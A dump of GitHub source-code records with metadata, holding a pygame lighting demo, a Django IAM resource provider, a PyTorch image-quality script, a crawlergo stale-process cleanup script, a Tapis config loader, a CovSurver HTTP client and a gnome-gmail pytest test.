"call"}, {"api_name": "os.system", 
"line_number": 113, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 115, "usage_type": "call"}, {"api_name": "os.system", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "37973340546", "text": "\"\"\"Inspired by FluffyPotatoe's example on youtube, but improved blurry lights\"\"\"\n#tags: light, fx, light emitter, light emission, lighting, emit light, particle, particles, oscillating light, oscillating, generate_oscillating_lights, image\n\n\nimport pygame, random\nimport thorpy as tp\nfrom thorpy.graphics import generate_oscillating_lights as gen_lights\n\npygame.init()\nW, H = 800,600\nscreen = pygame.display.set_mode((W, H))\n\n#load some background pic for testing\nbck = pygame.image.load(tp.fn(\"data/bck.jpg\")) \nbck = pygame.transform.smoothscale(bck, (W,H))\n\n#particles parameters\nMAX_RADIUS = 10\nRADIUS_FACTOR = 2\nRADIUS_DECAY = MAX_RADIUS / 200\nLIGHT_COLOR = (20, 20, 60)\nN = RADIUS_FACTOR*MAX_RADIUS\n\n\ndef circle_transp_bck(radius, color):\n surf = pygame.Surface((radius * 2, radius * 2))\n pygame.draw.circle(surf, color, (radius, radius), radius)\n surf.set_colorkey((0, 0, 0))\n return surf\n\ndef draw_light_particle(particle):\n pygame.draw.circle(screen,\n (255, 255, 255),\n [int(particle[0][0]), int(particle[0][1])],\n int(particle[2]))\n radius = particle[2] * RADIUS_FACTOR\n \n c = circle_transp_bck(radius, LIGHT_COLOR)\n r = c.get_rect()\n r.center = particle[0]\n #Fluffy Potatoe version: ############################################\n # screen.blit(c, r.topleft, special_flags=pygame.BLEND_RGB_ADD)\n #Thorpy version: ####################################################\n light = surfaces_light[int(radius)]\n rlight = light.get_rect()\n rlight.center = r.center\n screen.blit(light, rlight.topleft)\n\ndef generate_and_update_particles():\n #generate new particles\n particles.append([list(pygame.mouse.get_pos()), #pos\n [1.3*(random.random()*2 - 1), -4], #vel\n random.randint(MAX_RADIUS//2, MAX_RADIUS)]) #radius\n #update particles\n for particle in particles:\n particle[0][0] += particle[1][0] #update x\n particle[0][1] += particle[1][1] #update y\n particle[2] -= RADIUS_DECAY #reduce radius as time goes by\n particle[1][1] += 0.1 #gravity (update vy)\n draw_light_particle(particle)\n if particle[2] <= 0: #remove particle with negative or zero size\n particles.remove(particle)\n\n#put lights in cache (can take some time)\nsurfaces_light = []\nfor i in range(N+1):\n img = circle_transp_bck(i, LIGHT_COLOR)\n img_light = gen_lights(img,\n n=1, #number of frames\n inflation=0,\n radius_amplitude=3,\n alpha_factor_base=0.9*i/N + 0.1,\n alpha_factor_amplitude=0.,\n color=(255,255,255)\n )[0]\n surfaces_light.append(img_light)\n\n\n\nparticles = []\nclock = pygame.time.Clock()\nplaying = True\nwhile playing:\n screen.blit(bck, (0,0))\n generate_and_update_particles()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n playing = False\n ... 
#your stuff goes here\n pygame.display.flip()\n clock.tick(60)\n\npygame.quit()\n", "repo_name": "YannThorimbert/Thorpy2", "sub_path": "examples/_example_fx_lights.py", "file_name": "_example_fx_lights.py", "file_ext": "py", "file_size_in_byte": 3162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 14, "usage_type": "attribute"}, {"api_name": "thorpy.fn", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.transform.smoothscale", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.draw.circle", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 51, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 52, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 53, "usage_type": "call"}, {"api_name": "thorpy.graphics.generate_oscillating_lights", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 90, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "26525273517", "text": "from django.core.cache import cache\nfrom django.db.models import Q\n\nfrom gcloud.iam_auth.conf import SEARCH_INSTANCE_CACHE_TIME\nfrom iam import PathEqDjangoQuerySetConverter\nfrom iam.contrib.django.dispatcher import InvalidPageException\nfrom iam.resource.provider import ListResult, ResourceProvider\n\nfrom gcloud.contrib.appmaker.models import AppMaker\nfrom gcloud.core.models import Project\n\n\ndef mini_app_path_value_hook(value):\n # get id in \"/project,id/\"\n return value[1:-1].split(\",\")[1]\n\n\nclass MiniAppResourceProvider(ResourceProvider):\n def pre_search_instance(self, filter, page, **options):\n if page.limit == 0 or page.limit > 1000:\n raise InvalidPageException(\"limit in page too large\")\n\n def search_instance(self, filter, page, **options):\n \"\"\"\n mini app search instance\n \"\"\"\n keyword = filter.keyword\n cache_keyword = \"iam_search_instance_mini_app_{}\".format(keyword)\n project_id = filter.parent[\"id\"] if filter.parent else None\n\n results = cache.get(cache_keyword)\n if results is None:\n queryset = AppMaker.objects.filter(name__icontains=keyword, is_deleted=False).only(\"name\")\n if 
project_id:\n queryset = queryset.filter(project__id=project_id)\n results = [\n {\"id\": str(mini_app.id), \"display_name\": mini_app.name}\n for mini_app in queryset[page.slice_from : page.slice_to]\n ]\n cache.set(cache_keyword, results, SEARCH_INSTANCE_CACHE_TIME)\n return ListResult(results=results, count=len(results))\n\n def list_attr(self, **options):\n \"\"\"\n mini_app 不包含属性\n \"\"\"\n return ListResult(results=[], count=0)\n\n def list_attr_value(self, filter, page, **options):\n \"\"\"\n mini_app 不包含属性\n \"\"\"\n\n return ListResult(results=[], count=0)\n\n def list_instance(self, filter, page, **options):\n \"\"\"\n mini_app 上层资源为 project\n \"\"\"\n queryset = []\n with_path = False\n\n if not (filter.parent or filter.search or filter.resource_type_chain):\n queryset = AppMaker.objects.filter(is_deleted=False)\n elif filter.parent:\n parent_id = filter.parent[\"id\"]\n if parent_id:\n queryset = AppMaker.objects.filter(project_id=str(parent_id), is_deleted=False)\n else:\n queryset = AppMaker.objects.filter(is_deleted=False)\n elif filter.search and filter.resource_type_chain:\n # 返回结果需要带上资源拓扑路径信息\n with_path = True\n # 过滤 project mini_app 名称\n project_keywords = filter.search.get(\"project\", [])\n mini_app_keywords = filter.search.get(\"mini_app\", [])\n\n project_filter = Q()\n mini_app_filter = Q(is_deleted=False)\n\n for keyword in project_keywords:\n project_filter |= Q(name__icontains=keyword)\n\n for keyword in mini_app_keywords:\n mini_app_filter |= Q(name__icontains=keyword)\n\n project_ids = Project.objects.filter(project_filter).values_list(\"id\", flat=True)\n queryset = AppMaker.objects.filter(project_id__in=list(project_ids)).filter(mini_app_filter)\n\n count = queryset.count()\n results = [\n {\"id\": str(mini_app.id), \"display_name\": mini_app.name}\n for mini_app in queryset[page.slice_from : page.slice_to]\n ]\n\n if with_path:\n results = [\n {\n \"id\": str(mini_app.id),\n \"display_name\": mini_app.name,\n \"path\": [\n [{\"type\": \"project\", \"id\": str(mini_app.project_id), \"display_name\": mini_app.project.name}]\n ],\n }\n for mini_app in queryset[page.slice_from : page.slice_to]\n ]\n\n return ListResult(results=results, count=count)\n\n def fetch_instance_info(self, filter, **options):\n \"\"\"\n mini_app 没有定义属性,只处理 filter 中的 ids 字段\n \"\"\"\n ids = []\n if filter.ids:\n ids = [int(i) for i in filter.ids]\n\n queryset = AppMaker.objects.filter(id__in=ids)\n count = queryset.count()\n results = [\n {\"id\": str(mini_app.id), \"display_name\": mini_app.name, \"_bk_iam_approver_\": mini_app.creator}\n for mini_app in queryset\n ]\n return ListResult(results=results, count=count)\n\n def list_instance_by_policy(self, filter, page, **options):\n \"\"\"\n mini_app\n \"\"\"\n\n expression = filter.expression\n if not expression:\n return ListResult(results=[], count=0)\n\n key_mapping = {\n \"mini_app.id\": \"id\",\n \"mini_app.owner\": \"creator\",\n \"mini_app._bk_iam_path_\": \"project__id\",\n } # TODO 优化\n converter = PathEqDjangoQuerySetConverter(key_mapping, {\"project__id\": mini_app_path_value_hook})\n filters = converter.convert(expression)\n queryset = AppMaker.objects.filter(filters)\n count = queryset.count()\n\n results = [\n {\"id\": str(mini_app.id), \"display_name\": mini_app.name}\n for mini_app in queryset[page.slice_from : page.slice_to]\n ]\n\n return ListResult(results=results, count=count)\n", "repo_name": "TencentBlueKing/bk-sops", "sub_path": "gcloud/iam_auth/resource_api/mini_app.py", "file_name": "mini_app.py", "file_ext": 
"py", "file_size_in_byte": 5446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1001, "dataset": "github-code", "pt": "53", "api": [{"api_name": "iam.resource.provider.ResourceProvider", "line_number": 18, "usage_type": "name"}, {"api_name": "iam.contrib.django.dispatcher.InvalidPageException", "line_number": 21, "usage_type": "call"}, {"api_name": "django.core.cache.cache.get", "line_number": 31, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 31, "usage_type": "name"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 33, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 33, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 40, "usage_type": "call"}, {"api_name": "gcloud.iam_auth.conf.SEARCH_INSTANCE_CACHE_TIME", "line_number": 40, "usage_type": "argument"}, {"api_name": "django.core.cache.cache", "line_number": 40, "usage_type": "name"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 41, "usage_type": "call"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 47, "usage_type": "call"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 54, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 64, "usage_type": "name"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 68, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 68, "usage_type": "name"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 70, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 78, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 79, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 82, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 85, "usage_type": "call"}, {"api_name": "gcloud.core.models.Project.objects.filter", "line_number": 87, "usage_type": "call"}, {"api_name": "gcloud.core.models.Project.objects", "line_number": 87, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Project", "line_number": 87, "usage_type": "name"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 88, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 88, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 88, "usage_type": "name"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 108, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 118, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", 
"line_number": 118, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 118, "usage_type": "name"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 124, "usage_type": "call"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 133, "usage_type": "call"}, {"api_name": "iam.PathEqDjangoQuerySetConverter", "line_number": 140, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 142, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 142, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 142, "usage_type": "name"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "1187235577", "text": "def test_qa(io_dir, device='0'):\n \n import os\n from io_functions import read_img_as_tensor\n from torch.autograd import Variable\n from scipy.io import savemat\n import torch\n from glob import glob\n from tqdm import tqdm\n \n cuda1 = torch.device('cuda:' + device)\n \n enh_dir = io_dir + 'img_data/train_unlbld/restored_with_ensemble/'\n long_dir = io_dir + 'img_data/train_lbld/long_lp/'\n \n pred_qlty_dir = io_dir + 'img_data/train_unlbld/pred_qlty_mv/'\n model_dir = io_dir + 'checkpoints/qa_model_mv/modelq.pth'\n\n if not os.path.exists(pred_qlty_dir):\n os.mkdir(pred_qlty_dir)\n \n enh_files = glob(enh_dir + '*.png')\n long_files = os.listdir(long_dir)\n \n model = torch.load(model_dir)\n model = model.eval()\n model = model.cuda(cuda1)\n \n #################### computing long_features ###########################\n sum_long_features = torch.zeros((1,128), device=cuda1, dtype=torch.float32)\n for name in tqdm(long_files):\n\n im_long = read_img_as_tensor(long_dir + name, device)\n \n with torch.no_grad():\n long_features = model(im_long)\n \n sum_long_features += long_features\n \n sum_long_features = sum_long_features/len(long_files)\n sum_long_features = sum_long_features/torch.norm(sum_long_features)\n \n #################### computing similarity of short_features with long_features ###########################\n for path in tqdm(enh_files):\n \n name = os.path.basename(path)\n \n im_enh = read_img_as_tensor(enh_dir + name, device)\n \n with torch.no_grad():\n enh_features = model(im_enh)\n \n enh_features = enh_features/torch.norm(enh_features)\n \n pred_qlty = torch.matmul(enh_features, sum_long_features.t())\n pred_qlty = Variable(pred_qlty, requires_grad=False).cpu().numpy()\n pred_qlty_dict = {'pred_qlty':pred_qlty}\n savemat(pred_qlty_dir + name[:-4] + '.mat', pred_qlty_dict) ", "repo_name": "sameerIISc/SSL-LLR", "sub_path": "qa_codes/test_qa.py", "file_name": "test_qa.py", "file_ext": "py", "file_size_in_byte": 2019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.device", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 20, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 22, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.float32", 
"line_number": 30, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 31, "usage_type": "call"}, {"api_name": "io_functions.read_img_as_tensor", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 41, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "io_functions.read_img_as_tensor", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 56, "usage_type": "call"}, {"api_name": "scipy.io.savemat", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "590563877", "text": "#!/usr/bin/python3\n# coding: utf-8\n\n\"\"\"\n author: 猪猪侠 https://github.com/ring04h\n\n\"\"\"\n\nimport logging\nimport subprocess\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# \n# (crontab -l;echo '0 2 * * * /usr/local/bin/python3 /data/script/zombie_clean.py') | crontab -\n# \n\ndef is_timeout(etime):\n if '-' in etime:\n day, hour = etime.split('-')\n return True if int(day) >= 1 else False\n else:\n return False\n\n\ndef cmdprocess(cmdline):\n\n pipe = subprocess.Popen(cmdline, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output, stderr = pipe.communicate()\n return_code = pipe.returncode\n stderr = stderr.decode(errors='replace')\n output = output.decode(errors='replace')\n return output, stderr, return_code\n\n\n\ndef main():\n\n cmdline = \"ps -ef | grep crawlergo | grep -v grep | awk '{print $2}'\"\n output, stderr, return_code = cmdprocess(cmdline)\n \n if return_code != 0:\n return\n\n zombie_pids = output.splitlines()\n\n for zombie_pid in zombie_pids:\n\n cmdline = f'''ps -eo pid,etime | grep {zombie_pid}'''\n ps_output, ps_stderr, ps_return_code = cmdprocess(cmdline)\n\n if ps_return_code != 0:\n continue\n\n for line in ps_output.splitlines():\n \n pid, etime = line.split()\n\n status = is_timeout(etime)\n logging.debug(f\"PID: {pid:<8} ETIME: {etime:<15} TIMEOUT: {status}\")\n\n if not status: \n continue\n\n kill_cmdline = f\"kill -9 {pid}\"\n logging.debug(f\"call kill : [{kill_cmdline}]\")\n\n cmdprocess(kill_cmdline)\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "Qianlitp/crawlergo", "sub_path": "examples/zombie_clean.py", "file_name": "zombie_clean.py", "file_ext": "py", "file_size_in_byte": 1663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2635, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 12, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 28, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "35751115513", "text": "\"\"\"\nValidates service configuration based on jsonschema for any Tapis flask API. 
The base schema for all services is\nconfigschema.json, in this repo, but services can update or override the schema definition with\n\n\"\"\"\nimport json\nimport jsonschema\nimport os\nimport re\n\nfrom tapisservice.errors import BaseTapisError\n\nHERE = os.path.dirname(os.path.abspath(__file__))\n\n# load the base api schema -\nschema = json.load(open(os.path.join(HERE, 'configschema.json'), 'r'))\n\n# try to load an api-specific schema\nservice_configschema_path = os.environ.get('TAPIS_CONFIGSCHEMA_PATH', '/home/tapis/configschema.json')\ntry:\n api_schema = json.load(open(service_configschema_path, 'r'))\nexcept Exception as e:\n # at this point, logging is not set up yet, so we just print the message to the screen and hope for the best:\n msg = f'ERROR, improperly configured service. Could not load configschema.json found; ' \\\n f'looked in {service_configschema_path}. Aborting. Exception: {e}'\n print(msg)\n raise BaseTapisError(msg)\n\n# ----- Combine the service config schema with the base config schema -----\n# In what follows, we take a manual approach, but instead we could also have the service schema use the allOf\n# feature to pull in the base schema; cf., https://github.com/json-schema-org/json-schema-spec/issues/348\n# The downside with that would be that it is up to each service to include the base schema properly.\n\n# 1) we override properties defined in the base schema with properties defined in the service schema\napi_properties = api_schema.get('properties')\nif api_properties and type(api_properties) == dict:\n schema['properties'].update(api_properties)\n\n# 2) we extend the required properties with those specified as required by the API -\napi_required = api_schema.get('required')\nif api_required and type(api_required) == list:\n schema['required'].extend(api_required)\n\n\n# extend the default jsonschema validator to supply/modify the instance with default values supplied in the\n# schema definition. very surprising that this is not the default behavior;\n# see: https://python-jsonschema.readthedocs.io/en/stable/faq/\ndef extend_with_default(validator_class):\n validate_properties = validator_class.VALIDATORS[\"properties\"]\n\n def set_defaults(validator, properties, instance, schema):\n for property, subschema in properties.items():\n default_set = False\n # add support for environment variables for type string variables\n if subschema[\"type\"] == \"string\":\n # environment variables override any default set in the jsonschema\n if os.environ.get(property):\n default_set = True\n instance.setdefault(property, os.environ.get(property))\n # check for a default supplied in the jsonschem doc\n if \"default\" in subschema and not default_set:\n instance.setdefault(property, subschema[\"default\"])\n\n for error in validate_properties(\n validator, properties, instance, schema,\n ):\n yield error\n\n return jsonschema.validators.extend(\n validator_class, {\"properties\": set_defaults},\n )\n\n\nDefaultValidatingDraft7Validator = extend_with_default(jsonschema.Draft7Validator)\n\n\ndef match_and_replace_env_variables(txt_to_match: str) -> str:\n \"\"\"\n A function to look through a str for any instances of '$env{ * }. If an instance is located\n the interior of the braces is compared to existing environment variables. 
If the variable exists\n it is then subbed into the text allow users to substitute environment variables directly into\n their configs.\n \"\"\"\n environ_regex_pattern = re.compile(r'\\$env\\{(.*?)\\}')\n pattern_matches = environ_regex_pattern.findall(txt_to_match)\n for matched_var in pattern_matches:\n if os.environ.get(matched_var):\n txt_to_match = txt_to_match.replace(f\"$env{{{matched_var}}}\", os.environ.get(matched_var))\n return txt_to_match\n\n\n# now that we have the required API config schema, we need to validate it against the actual configs supplied\n# to the service.\n\nclass Config(dict):\n \"\"\"\n A class containing an API service's config, as a Python dictionary, with getattr and setattr defined to make\n attribute access work like a \"normal\" object. One should import the singleton Conf directly from this module.\n\n Example usage:\n ~~~~~~~~~~~~~~\n from config import conf <-- all service configs loaded and validated against the\n conf.some_key <-- AttributeError raised if some_key (optional) config not defined\n \"\"\"\n\n def __getattr__(self, key):\n # returning an AttributeError is important for making deepcopy work. cf.,\n # http://stackoverflow.com/questions/25977996/supporting-the-deep-copy-operation-on-a-custom-class\n try:\n return self[key]\n except KeyError as e:\n raise AttributeError(e)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n @classmethod\n def get_config_from_file(self):\n \"\"\"\n Reads service config from a JSON file\n :return:\n \"\"\"\n path = os.environ.get('TAPIS_CONFIG_PATH', '/home/tapis/config.json')\n if os.path.exists(path):\n try:\n with open(path, 'r') as config_raw:\n config_txt = config_raw.read()\n config_with_env = match_and_replace_env_variables(config_txt)\n return json.loads(config_with_env)\n except Exception as e:\n msg = f'Could not load configs from JSON file at: {path}. 
exception: {e}'\n print(msg)\n raise BaseTapisError(msg)\n\n @classmethod\n def load_config(cls):\n \"\"\"\n Load the config from various places, including a JSON file and environment variables.\n :return:\n \"\"\"\n file_config = cls.get_config_from_file()\n # validate config against schema definition\n try:\n # jsonschema.validate(instance=file_config, schema=schema)\n DefaultValidatingDraft7Validator(schema).validate(file_config)\n except jsonschema.SchemaError as e:\n msg = f'Invalid service config: exception: {e}'\n print(msg)\n raise BaseTapisError(msg)\n return file_config\n\n\nconf = Config(Config.load_config())", "repo_name": "tapis-project/tapipy-tapisservice", "sub_path": "tapisservice/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 6379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 13, "usage_type": "call"}, {"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 21, "usage_type": "call"}, {"api_name": "tapisservice.errors.BaseTapisError", "line_number": 27, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 57, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 59, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 59, "usage_type": "attribute"}, {"api_name": "jsonschema.validators.extend", "line_number": 69, "usage_type": "call"}, {"api_name": "jsonschema.validators", "line_number": 69, "usage_type": "attribute"}, {"api_name": "jsonschema.Draft7Validator", "line_number": 74, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 84, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 87, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 88, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 123, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 129, "usage_type": "call"}, {"api_name": "tapisservice.errors.BaseTapisError", "line_number": 133, "usage_type": "call"}, {"api_name": "jsonschema.SchemaError", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tapisservice.errors.BaseTapisError", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "40979824469", "text": "import io\nimport logging\nimport re\nfrom typing import Optional, TextIO\n\nimport aiohttp\n\nlogger = logging.getLogger(\"covsurver-client\")\n\nCOVSURVER_BASE_LINK = \"https://mendel3.bii.a-star.edu.sg/METHODS/corona/delta6\"\nCOVSURVER_REQUEST_LINK = COVSURVER_BASE_LINK + 
\"/cgi-bin/coronamapBlastAnno.pl\"\n\n\nasync def fetch_covsurver_report(fasta: str | TextIO) -> Optional[str]:\n \"\"\"Fetch CovSurver report for a given fasta. Raw result contains tsv as string.\n\n Parameters\n ----------\n fasta : str | TextIO\n fasta with sequences\n\n Returns\n -------\n Optional[str]\n CovSurver report as tsv string\n \"\"\"\n\n stream = io.StringIO(fasta) if isinstance(fasta, str) else fasta\n\n async with aiohttp.ClientSession() as session:\n logger.debug(\"POST request to: %s\", COVSURVER_REQUEST_LINK)\n\n async with session.post(\n COVSURVER_REQUEST_LINK, data={\"seqfile\": stream}\n ) as response:\n response_text = await response.text()\n if not response.ok:\n logger.error(\n \"POST response status: %s, body: %s\",\n response.status,\n response_text,\n )\n return\n else:\n logger.debug(\"POST response status: %s\", response.status)\n\n result_link_search = re.search(\n r\"/mendeltemp/covsurver_result\\d+_perquery.tsv\", response_text\n )\n if not result_link_search:\n logger.error(\n \"No result link in response, response body: %s\", response_text\n )\n return\n\n result_link = COVSURVER_BASE_LINK + result_link_search.group(0)\n\n logger.debug(\"GET request to: %s\", result_link)\n async with session.get(result_link) as response:\n if not response.ok:\n logger.error(\"GET response status: %s\", response.status)\n return\n else:\n logger.debug(\"GET response status: %s\", response.status)\n\n covsurver_report = await response.text()\n\n return covsurver_report\n", "repo_name": "kirill-varchenko/covsurver-client", "sub_path": "covsurver_client/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 2132, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "typing.TextIO", "line_number": 14, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 28, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 30, "usage_type": "call"}, {"api_name": "re.search", "line_number": 47, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "72964600809", "text": "# -*- coding: utf-8 -*-\n\nimport pytest\n\nfrom six.moves import urllib\n\nimport gnomegmail\n\nbase_mail_dict = {\n 'to': \"to@exämple.com\",\n 'from': \"from@exämple.com\",\n}\n\n\n@pytest.mark.parametrize(\"body\", (\n \"\",\n \"simple body\",\n \"body with http://example.com/link\",\n))\n@pytest.mark.parametrize(\"attach\", (False, True))\n@pytest.mark.parametrize(\"cc\", ([], [\"cc@example.com\"]))\n@pytest.mark.parametrize(\"bcc\", ([], [\"bcc@example.com\"]))\n@pytest.mark.parametrize(\"su\", ([], [\"subject\"]))\ndef test_gmailapi(web_fxt, tmpfile, su, bcc, cc, attach, body):\n mail_dict = base_mail_dict.copy()\n\n if body:\n mail_dict['body'] = body\n\n if attach:\n mail_dict['attach'] = [urllib.request.pathname2url(tmpfile)]\n\n if cc:\n mail_dict['cc'] = cc\n\n if bcc:\n mail_dict['bcc'] = bcc\n\n if su:\n mail_dict['su'] = su\n\n gmailapi = gnomegmail.GMailAPI(mail_dict)\n gmailapi.form_message()\n id = gmailapi.upload_mail('user', 'atoken')\n\n assert id == '1'\n", "repo_name": "davesteele/gnome-gmail", "sub_path": "test/test_gmailapi.py", "file_name": "test_gmailapi.py", "file_ext": "py", "file_size_in_byte": 1001, "program_lang": "python", "lang": 